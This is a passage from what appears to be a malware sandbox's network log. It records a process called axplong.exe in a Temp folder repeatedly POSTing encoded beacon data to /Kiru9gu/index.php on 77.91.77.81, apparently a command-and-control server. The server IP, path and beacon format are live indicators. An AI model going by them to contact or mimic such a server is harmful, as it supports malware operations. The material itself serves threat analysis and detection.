Jul 2, 2024 00:25:50.593245983 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:50.810106039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49777	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:50.918145895 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:51.652353048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:51.653331041 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:51.875099897 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49778	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:51.997663975 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:52.721287966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:52.722177029 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:52.950196981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49779	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:53.060506105 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:54.853240013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:54.853403091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:54.853571892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:54.854770899 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:55.075937986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49780	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:55.184998035 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:55.946350098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:55.949414968 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:56.170958042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49782	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:56.294636011 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:57.012132883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:57.012991905 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:57.245352030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49783	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:57.355557919 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:58.063947916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:58.065080881 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:58.288095951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49784	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:58.404119968 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:25:59.105945110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:25:59.106956959 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:25:59.330193043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:25:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49785	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:25:59.451220036 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:00.144156933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:00.145042896 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:00.363490105 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49786	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:00.482901096 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:01.190731049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:01.194610119 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:01.419979095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49787	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:01.527718067 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:02.301826954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:02.303034067 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:02.531218052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49788	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:02.652535915 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:03.374509096 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:26:04.098298073 CEST	304	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Jul 2, 2024 00:26:04.335345030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:26:04.495989084 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:26:05.146099091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	77.91.77.81	80	7548	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
